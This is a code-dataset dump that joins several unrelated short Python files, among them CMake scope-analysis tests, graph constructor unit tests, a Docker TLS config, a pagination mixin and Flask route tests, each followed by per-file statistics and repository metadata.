"""Test that a variable is marked as used at the toplevel."""
script = "f ({0})".format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.used_vars[0],
MatchesStructure(source=Equals(VarSrc.GlobalVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_func(self, call):
"""Test that a variable is marked as used in a function."""
script = ("function (name)\n"
" f ({0})\n"
"endfunction ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.FunctionVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_macro(self, call):
"""Test that a variable is marked as used in a macro."""
script = ("macro (name)\n"
" f ({0})\n"
"endmacro ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.MacroVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_func_nest(self, call):
"""Test that a variable is marked as used in a function when nested."""
script = ("function (name)\n"
" if ()"
" f ({0})\n"
" endif ()"
"endfunction ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.FunctionVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_func_if(self, call):
"""Test that a variable is marked as used in a function when nested."""
script = ("function (name)\n"
" if ({0})"
" endif ()"
"endfunction ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.FunctionVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_macro_if(self, call):
"""Test that a variable is marked as used in a function when nested."""
script = ("macro (name)\n"
" if ({0})"
" endif ()"
"endmacro ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.MacroVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_func_foreach(self, call):
"""Test that a variable is marked as used in a function when nested."""
script = ("function (name)\n"
" foreach (VAR {0})"
" endforeach ()"
"endfunction ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.FunctionVar)))
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_used_in_macro_foreach(self, call):
"""Test that a variable is marked as used in a function when nested."""
script = ("macro (name)\n"
" foreach (VAR {0})"
" endforeach ()"
"endmacro ()\n").format(call)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].used_vars[0],
MatchesStructure(source=Equals(VarSrc.MacroVar)))
def test_not_used_in_function_hdr(self):
"""Test that there is no use in a function header."""
script = ("function (name ARGUMENT)\n"
"endfunction ()")
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertEqual(len(global_scope.scopes[0].used_vars), 0)
def test_no_use_by_foreach_var(self):
"""Test that there is no use for a foreach var."""
script = ("foreach (VAR ${LIST})\n"
"endforeach ()")
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.used_vars[0].node,
MatchesStructure(contents=Not(Equals("VAR"))))
@parameterized.expand(find_variables_in_scopes.FOREACH_KEYWORDS)
def test_exclude_foreach_kws(self, keyword):
"""Test that there is no use for a foreach keyword."""
script = ("foreach (VAR {0} LIST)\n"
"endforeach ()").format(keyword)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.used_vars[0].node,
MatchesStructure(contents=Not(Equals(keyword))))
@parameterized.expand(find_variables_in_scopes.IF_KEYWORDS)
def test_exclude_if_kws(self, keyword):
"""Test that there is no use for an if keyword."""
script = ("if ({0} OTHER)\n"
"endif ()").format(keyword)
global_scope = find_variables_in_scopes.used_in_tree(ast.parse(script))
self.assertThat(global_scope.used_vars[0].node,
MatchesStructure(contents=Not(Equals(keyword))))
| 46.75 | 79 | 0.614557 | 1,677 | 14,399 | 5.042338 | 0.081694 | 0.068945 | 0.053217 | 0.074503 | 0.821902 | 0.809721 | 0.777318 | 0.76088 | 0.733207 | 0.693354 | 0 | 0.005987 | 0.269255 | 14,399 | 307 | 80 | 46.90228 | 0.797662 | 0.119036 | 0 | 0.663793 | 0 | 0 | 0.138198 | 0.002073 | 0 | 0 | 0 | 0 | 0.112069 | 1 | 0.107759 | false | 0 | 0.047414 | 0 | 0.168103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
013134c7b9da253534e31f8aa1b2d6670b2e1a14 | 36 | py | Python | reporter/sources/pipe/__init__.py | Wikia/jira-reporter | af8a2df6dfb679872b82cba67560961d0ad5b2fb | [
"MIT"
] | 3 | 2015-08-19T13:27:24.000Z | 2022-01-14T15:46:19.000Z | reporter/sources/pipe/__init__.py | Wikia/jira-reporter | af8a2df6dfb679872b82cba67560961d0ad5b2fb | [
"MIT"
] | 74 | 2015-01-22T16:30:20.000Z | 2022-03-25T17:03:00.000Z | reporter/sources/pipe/__init__.py | Wikia/jira-reporter | af8a2df6dfb679872b82cba67560961d0ad5b2fb | [
"MIT"
] | 3 | 2016-04-10T18:26:00.000Z | 2020-06-17T06:35:15.000Z | from .pipe import ReportsPipeSource
| 18 | 35 | 0.861111 | 4 | 36 | 7.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0142fc58a701b43bfe5fb293ddaa29b838ecfd09 | 136 | py | Python | ren1/toolspec/OpenGL.py | chadaustin/renaissance | c6e55e2e14b52b3b813a28c83557b5ec963167e3 | [
"MIT"
] | 4 | 2018-11-15T19:31:57.000Z | 2021-04-06T04:24:53.000Z | ren1/toolspec/OpenGL.py | chadaustin/renaissance | c6e55e2e14b52b3b813a28c83557b5ec963167e3 | [
"MIT"
] | 1 | 2020-05-17T17:47:37.000Z | 2020-05-25T17:49:53.000Z | ren1/toolspec/OpenGL.py | chadaustin/renaissance | c6e55e2e14b52b3b813a28c83557b5ec963167e3 | [
"MIT"
] | 1 | 2018-11-22T15:35:05.000Z | 2018-11-22T15:35:05.000Z | def generate(env):
env.Append(CPPDEFINES=['GLEW_STATIC'],
LIBS=['opengl32', 'glu32'])
def exists(env):
return 1
| 19.428571 | 42 | 0.588235 | 16 | 136 | 4.9375 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048544 | 0.242647 | 136 | 6 | 43 | 22.666667 | 0.718447 | 0 | 0 | 0 | 1 | 0 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
01515d761b6ec4b2c735ebd0094201f6effa5b4d | 7,610 | py | Python | test/constructor_tests/test_graph_constructor_base.py | wwu-mmll/photonai_graph | b758c7efa878ef4533ed4f66d6579019167bfa9e | [
"MIT"
] | null | null | null | test/constructor_tests/test_graph_constructor_base.py | wwu-mmll/photonai_graph | b758c7efa878ef4533ed4f66d6579019167bfa9e | [
"MIT"
] | 4 | 2022-03-30T20:09:02.000Z | 2022-03-31T13:55:59.000Z | test/constructor_tests/test_graph_constructor_base.py | wwu-mmll/photonai_graph | b758c7efa878ef4533ed4f66d6579019167bfa9e | [
"MIT"
] | null | null | null | import unittest
import numpy as np
from photonai_graph.GraphConstruction.graph_constructor_threshold import GraphConstructorThreshold
class ThresholdTests(unittest.TestCase):
def setUp(self):
self.X4d_adjacency = np.ones((20, 20, 20, 1))
self.X4d_features = np.random.rand(20, 20, 20, 1)
self.X4d = np.concatenate((self.X4d_adjacency, self.X4d_features), axis=3)
self.test_mtrx = np.array(([0.5, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 0.5]))
self.y = np.ones(20)
def test_wrong_input_shape(self):
g_constr = GraphConstructorThreshold(threshold=.5)
input_mtrx = np.ones((15, 20, 20))
g_constr.fit(input_mtrx, np.arange(15))
with self.assertRaises(ValueError):
g_constr.transform(input_mtrx)
def test_strange_one_hot_value(self):
with self.assertRaises(ValueError):
GraphConstructorThreshold(one_hot_nodes=27.3)
def test_threshold_4d(self):
# ensure that individual transform style with a 4d matrix returns the right shape
g_constr = GraphConstructorThreshold(threshold=0.5)
g_constr.fit(self.X4d, self.y)
trans = g_constr.transform(self.X4d)
self.assertEqual(trans.shape, (20, 20, 20, 3))
# first dimension should be thresholded but unchanged
self.assertTrue(np.array_equal(trans[..., 0, np.newaxis], self.X4d_adjacency))
# second dimension should contain original connectivity
self.assertTrue(np.array_equal(trans[..., 1, np.newaxis], self.X4d_adjacency))
# last dimension should contain the random features
self.assertTrue(np.array_equal(trans[..., 2, np.newaxis], self.X4d_features))
def test_threshold_4d_discard_connectivity(self):
# ensure that individual transform style with a 4d matrix returns the right shape
g_constr = GraphConstructorThreshold(threshold=0.5,
discard_original_connectivity=True)
g_constr.fit(self.X4d, self.y)
trans = g_constr.transform(self.X4d)
self.assertEqual(trans.shape, (20, 20, 20, 2))
# first dimension should be thresholded but unchanged
self.assertTrue(np.array_equal(trans[..., 0, np.newaxis], self.X4d_adjacency))
# last dimension should contain the random features
self.assertTrue(np.array_equal(trans[..., 1, np.newaxis], self.X4d_features))
def test_threshold_shape_4d_onehot(self):
# ensure that an individual transform with a 3d matrix returns the right shape
# when using one hot encoded features
g_constr = GraphConstructorThreshold(threshold=0.5, one_hot_nodes=1)
g_constr.fit(self.X4d, self.y)
trans = g_constr.transform(self.X4d)
self.assertEqual(trans.shape, (20, 20, 20, 4))
# the first dimension still contains the (thresholded but unchanged) values
self.assertTrue(np.array_equal(trans[..., 0, np.newaxis], self.X4d_adjacency))
# the second dimesion contains the one hot encoding
# We know the one hot encoding, as we created the matrix accordingly
self.assertTrue(np.array_equal(trans[..., 1, np.newaxis],
np.repeat(np.eye(20)[np.newaxis, ...], 20, axis=0)[..., np.newaxis]))
# the third dimension contains again the original values
self.assertTrue(np.array_equal(trans[..., 2, np.newaxis], self.X4d_adjacency))
# the last dimension contains the features
self.assertTrue(np.array_equal(trans[..., 3, np.newaxis], self.X4d_features))
def test_threshold_individual_shape_4d_onehot_discard_connectivity(self):
# ensure that an individual transform with a 3d matrix returns the right shape
# when using one hot encoded features
g_constr = GraphConstructorThreshold(threshold=0.5,
one_hot_nodes=1,
discard_original_connectivity=True)
g_constr.fit(self.X4d, self.y)
trans = g_constr.transform(self.X4d)
self.assertEqual(trans.shape, (20, 20, 20, 3))
# the first dimension still contains the (thresholded but unchanged) values
self.assertTrue(np.array_equal(trans[..., 0, np.newaxis], self.X4d_adjacency))
# the second dimesion contains the one hot encoding
# We know the one hot encoding, as we created the matrix accordingly
self.assertTrue(np.array_equal(trans[..., 1, np.newaxis],
np.repeat(np.eye(20)[np.newaxis, ...], 20, axis=0)[..., np.newaxis]))
# the last dimension contains the features
self.assertTrue(np.array_equal(trans[..., 2, np.newaxis], self.X4d_features))
def test_prep_matrix(self):
g_constr = GraphConstructorThreshold(threshold=.0, use_abs=True)
input_matrix = np.eye(4)
output_matrix = g_constr.prep_mtrx(input_matrix * -1)
self.assertTrue(np.array_equal(input_matrix, output_matrix))
def test_use_abs(self):
g_constr = GraphConstructorThreshold(threshold=0.5, use_abs=True)
input_matrix = np.eye(4) * -1
output_matrix = g_constr.prep_mtrx(input_matrix)
self.assertTrue(np.array_equal(np.eye(4), output_matrix))
def test_use_abs_fisher(self):
g_constr = GraphConstructorThreshold(threshold=0.5, fisher_transform=1, use_abs_fisher=1)
input_matrix = np.eye(4) * -1
input_matrix = input_matrix[np.newaxis, :, :, np.newaxis]
output_matrix = g_constr.prep_mtrx(input_matrix)
ids = np.diag(output_matrix[0, ..., 0])
self.assertTrue(np.array_equal(np.isposinf(ids), [True, True, True, True]))
def test_use_zscore(self):
g_constr = GraphConstructorThreshold(threshold=0.5, zscore=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 0)), 4)
def test_use_abs_zscore(self):
g_constr = GraphConstructorThreshold(threshold=0.5, zscore=1, use_abs_zscore=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 0)), 16)
def test_use_abs_and_fisher(self):
g_constr = GraphConstructorThreshold(threshold=0.5, use_abs=1, fisher_transform=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 1)), 2)
def test_use_abs_and_fisher_and_abs_fisher(self):
g_constr = GraphConstructorThreshold(threshold=0.5, use_abs=1, fisher_transform=1, use_abs_fisher=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 1)), 2)
def test_use_abs_and_fisher_and_zsore(self):
g_constr = GraphConstructorThreshold(threshold=0.5, use_abs=1, fisher_transform=1, zscore=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 1)), 2)
def test_fisher_and_zscore_and_abszscore(self):
g_constr = GraphConstructorThreshold(threshold=0.5, fisher_transform=1, zscore=1, use_abs_zscore=1)
output_matrix = g_constr.prep_mtrx(self.test_mtrx[np.newaxis, :, :, np.newaxis])
self.assertEqual((np.sum(np.array(output_matrix) >= 1)), 2)
| 54.748201 | 108 | 0.663469 | 1,020 | 7,610 | 4.756863 | 0.114706 | 0.047609 | 0.042869 | 0.064922 | 0.828112 | 0.804823 | 0.759481 | 0.752885 | 0.704452 | 0.68817 | 0 | 0.032645 | 0.223127 | 7,610 | 138 | 109 | 55.144928 | 0.788058 | 0.152694 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.27 | 1 | 0.16 | false | 0 | 0.03 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6d6ddb04320c1bec75b8b79194eed7974535b849 | 236 | py | Python | remoteappmanager/tests/fixtures/remoteappmanager_config.py | fossabot/simphony-remote | 2f3c2d0b7e3b5b3b6a747c929ba6224f622bab33 | [
"BSD-3-Clause"
] | 6 | 2016-10-17T18:37:56.000Z | 2021-12-16T09:38:08.000Z | remoteappmanager/tests/fixtures/remoteappmanager_config.py | fossabot/simphony-remote | 2f3c2d0b7e3b5b3b6a747c929ba6224f622bab33 | [
"BSD-3-Clause"
] | 570 | 2016-06-23T12:09:31.000Z | 2022-03-15T17:04:00.000Z | remoteappmanager/tests/fixtures/remoteappmanager_config.py | fossabot/simphony-remote | 2f3c2d0b7e3b5b3b6a747c929ba6224f622bab33 | [
"BSD-3-Clause"
] | 8 | 2018-03-23T00:00:51.000Z | 2021-08-30T18:54:40.000Z | tls = True
tls_verify = True
tls_ca = '~/.docker/machine/machines/default/ca.pem'
tls_cert = '~/.docker/machine/machines/default/cert.pem'
tls_key = '~/.docker/machine/machines/default/key.pem'
docker_host = "tcp://192.168.99.100:2376"
| 33.714286 | 56 | 0.733051 | 37 | 236 | 4.540541 | 0.486486 | 0.232143 | 0.375 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068807 | 0.076271 | 236 | 6 | 57 | 39.333333 | 0.701835 | 0 | 0 | 0 | 0 | 0 | 0.639831 | 0.639831 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6d77ecb64f5549a47b0f1156762657bee4124b1f | 162 | py | Python | inet/__init__.py | nestauk/inet | 084d83b1b12652ecb195d241a7d8619315d98998 | [
"MIT"
] | null | null | null | inet/__init__.py | nestauk/inet | 084d83b1b12652ecb195d241a7d8619315d98998 | [
"MIT"
] | null | null | null | inet/__init__.py | nestauk/inet | 084d83b1b12652ecb195d241a7d8619315d98998 | [
"MIT"
] | 2 | 2017-03-09T17:10:20.000Z | 2020-12-16T20:27:04.000Z | # -*- coding: utf-8 -*-
# @Author: James Gardiner
# @Date: 2016-12-13 13:51:46
# @Last Modified by: James Gardiner
# @Last Modified time: 2017-01-24 08:53:13
| 27 | 42 | 0.641975 | 27 | 162 | 3.851852 | 0.777778 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.218045 | 0.179012 | 162 | 5 | 43 | 32.4 | 0.56391 | 0.932099 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6d9b06250ea42e734c25bcd1ae32b7befbd62ca1 | 160 | py | Python | NET_Solver/boundary/__init__.py | phy-ml/neural-solver | 4f5f5e8ab84fa2f6d759f8278683c6a70b16caec | [
"MIT"
] | 2 | 2021-12-05T09:30:22.000Z | 2021-12-05T09:30:40.000Z | NET_Solver/boundary/__init__.py | phy-ml/neural-solver | 4f5f5e8ab84fa2f6d759f8278683c6a70b16caec | [
"MIT"
] | null | null | null | NET_Solver/boundary/__init__.py | phy-ml/neural-solver | 4f5f5e8ab84fa2f6d759f8278683c6a70b16caec | [
"MIT"
] | null | null | null | from .boundary import *
from .Dirichlet import *
from .Neumann import *
from .Periodic import *
from .hard_soft import *
from .transform_neumann import *
| 22.857143 | 33 | 0.7375 | 20 | 160 | 5.8 | 0.45 | 0.431034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 160 | 6 | 34 | 26.666667 | 0.892308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6de8c17b3fe1f71c0bd5e8eaa92e8a1f74efb39c | 43 | py | Python | sys-opration.py | xuzewei/jupyter | 85c3627f09a672a3c63db65efc945f76922c19ca | [
"Apache-2.0"
] | null | null | null | sys-opration.py | xuzewei/jupyter | 85c3627f09a672a3c63db65efc945f76922c19ca | [
"Apache-2.0"
] | null | null | null | sys-opration.py | xuzewei/jupyter | 85c3627f09a672a3c63db65efc945f76922c19ca | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
import sys
print(sys.path)
| 8.6 | 15 | 0.72093 | 8 | 43 | 3.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 0.139535 | 43 | 4 | 16 | 10.75 | 0.810811 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
6df9e5fea469d0a52ffa1b46e4ff453e161560b4 | 293 | py | Python | guestbook/views/parametrized_pagination_mixin.py | dagothar/django-guestbook | ed3e9608f3b973187bd7987557b3b04375cb1549 | [
"MIT"
] | null | null | null | guestbook/views/parametrized_pagination_mixin.py | dagothar/django-guestbook | ed3e9608f3b973187bd7987557b3b04375cb1549 | [
"MIT"
] | null | null | null | guestbook/views/parametrized_pagination_mixin.py | dagothar/django-guestbook | ed3e9608f3b973187bd7987557b3b04375cb1549 | [
"MIT"
] | null | null | null | class ParametrizedPaginationMixin():
"""Allows customizing paginate_by by checking for optional GET request
parameter: ?paginate_by
"""
def get_paginate_by(self, queryset):
paginate_by = self.request.GET.get('paginate_by', self.paginate_by)
return paginate_by
| 32.555556 | 75 | 0.723549 | 35 | 293 | 5.828571 | 0.457143 | 0.343137 | 0.205882 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191126 | 293 | 8 | 76 | 36.625 | 0.860759 | 0.31058 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
09d98b5cbe037491a951ae3c144852da11fa0e11 | 126 | py | Python | matrix/exceptions.py | wwhtrbbtt/matrix.py | f299fce96182a72b30aaf3a8eddbdf4be1675161 | [
"MIT"
] | 4 | 2022-01-01T22:17:22.000Z | 2022-03-01T03:42:29.000Z | matrix/exceptions.py | wwhtrbbtt/matrix.py | f299fce96182a72b30aaf3a8eddbdf4be1675161 | [
"MIT"
] | null | null | null | matrix/exceptions.py | wwhtrbbtt/matrix.py | f299fce96182a72b30aaf3a8eddbdf4be1675161 | [
"MIT"
] | null | null | null | class MatrixError(Exception):
pass
class NotAuthenticated(Exception):
pass
class ParsingError(Exception):
pass
| 12.6 | 34 | 0.738095 | 12 | 126 | 7.75 | 0.5 | 0.419355 | 0.387097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 126 | 9 | 35 | 14 | 0.911765 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
09e8037a6eb7aaea5804831a8f8110ba69e29a4b | 57 | py | Python | aiorss/insertfeed.py | bradybellini/aiorss | f50f72e380f80506f835d7eac3410d2d18ab20a0 | [
"MIT"
] | null | null | null | aiorss/insertfeed.py | bradybellini/aiorss | f50f72e380f80506f835d7eac3410d2d18ab20a0 | [
"MIT"
] | null | null | null | aiorss/insertfeed.py | bradybellini/aiorss | f50f72e380f80506f835d7eac3410d2d18ab20a0 | [
"MIT"
] | null | null | null | import asyncio
import asyncpg
class InsertFeed:
pass | 11.4 | 17 | 0.789474 | 7 | 57 | 6.428571 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192982 | 57 | 5 | 18 | 11.4 | 0.978261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
61f1a0bc446d35752bf9571fabd1d671c5d8f313 | 149 | py | Python | dose_calculation.py | mdshane/semhelper | eeb177cb2fec22e53f46c24fbcfa1485cfa78005 | [
"MIT"
] | 1 | 2019-11-11T16:47:41.000Z | 2019-11-11T16:47:41.000Z | dose_calculation.py | mdshane/semhelper | eeb177cb2fec22e53f46c24fbcfa1485cfa78005 | [
"MIT"
] | null | null | null | dose_calculation.py | mdshane/semhelper | eeb177cb2fec22e53f46c24fbcfa1485cfa78005 | [
"MIT"
] | null | null | null | def dose(pitch_x, pitch_y, passes, current, dwell_time):
dose = (dwell_time * passes * current)/(pitch_x * pitch_y)
# nC/µm^2
return dose | 37.25 | 62 | 0.671141 | 24 | 149 | 3.916667 | 0.541667 | 0.12766 | 0.234043 | 0.255319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008403 | 0.201342 | 149 | 4 | 63 | 37.25 | 0.781513 | 0.04698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.666667 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
112b02ee683d109945b45b2f7ffd93aba6da0005 | 34 | py | Python | double3/double3sdk/bluetooth/__init__.py | CLOMING/winter2021_double | 9b920baaeb3736a785a6505310b972c49b5b21e9 | [
"Apache-2.0"
] | null | null | null | double3/double3sdk/bluetooth/__init__.py | CLOMING/winter2021_double | 9b920baaeb3736a785a6505310b972c49b5b21e9 | [
"Apache-2.0"
] | null | null | null | double3/double3sdk/bluetooth/__init__.py | CLOMING/winter2021_double | 9b920baaeb3736a785a6505310b972c49b5b21e9 | [
"Apache-2.0"
] | null | null | null | from .bluetooth import _Bluetooth
| 17 | 33 | 0.852941 | 4 | 34 | 7 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
113756c9eabaae19f5b7b79e5002835e318882b5 | 4,092 | py | Python | app/tests/test_recipe.py | Frozenaught/homechopped | 7c17abe98a1b4cb0ed6bced0d944d29a24dcbc27 | [
"BSD-Source-Code"
] | null | null | null | app/tests/test_recipe.py | Frozenaught/homechopped | 7c17abe98a1b4cb0ed6bced0d944d29a24dcbc27 | [
"BSD-Source-Code"
] | 2 | 2021-06-04T10:46:13.000Z | 2021-06-04T10:46:51.000Z | app/tests/test_recipe.py | NicBritz/homechopped | 7c17abe98a1b4cb0ed6bced0d944d29a24dcbc27 | [
"BSD-Source-Code"
] | 1 | 2020-06-20T13:14:56.000Z | 2020-06-20T13:14:56.000Z | from app import app
###############
# RECIPE VIEW #
###############
def test_recipe_main():
# test page link
response = app.test_client().get('/recipe/')
assert response.status_code == 404
# test pages,limits and page number
response = app.test_client().get('/recipe/5ee8f301c6eaae959bac7b00')
assert response.status_code == 200
# test error handling
response = app.test_client().get('/recipe/sgad1')
assert response.status_code == 404
###############
# TEMP RECIPE #
###############
def test_temp_recipe():
# test page link
response = app.test_client().get('/add_temp_recipe/')
assert response.status_code == 404
# test redirect
response = app.test_client().get('/add_temp_recipe/gfdsgd', follow_redirects=True)
assert response.status_code == 200
####################
